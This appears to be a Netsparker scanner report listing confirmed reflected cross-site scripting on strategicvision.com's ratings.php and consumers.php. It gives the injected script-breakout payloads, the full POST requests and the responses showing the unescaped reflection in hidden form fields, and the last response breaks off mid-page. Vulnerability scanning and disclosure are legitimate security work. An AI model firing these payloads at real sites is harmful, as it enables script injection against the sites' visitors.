http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000E0F)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 200
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E0F)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:55:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x000E0F)</script>" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="&..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x000E10)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 200
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E10)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="'"--></style></script><script>netsparker(0x000E10)</script>" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="&..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
Make POST 3
numCars POST '"--></style></script><script>alert(0x000E88)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 197
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&Make=3&numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E88)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:56:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a 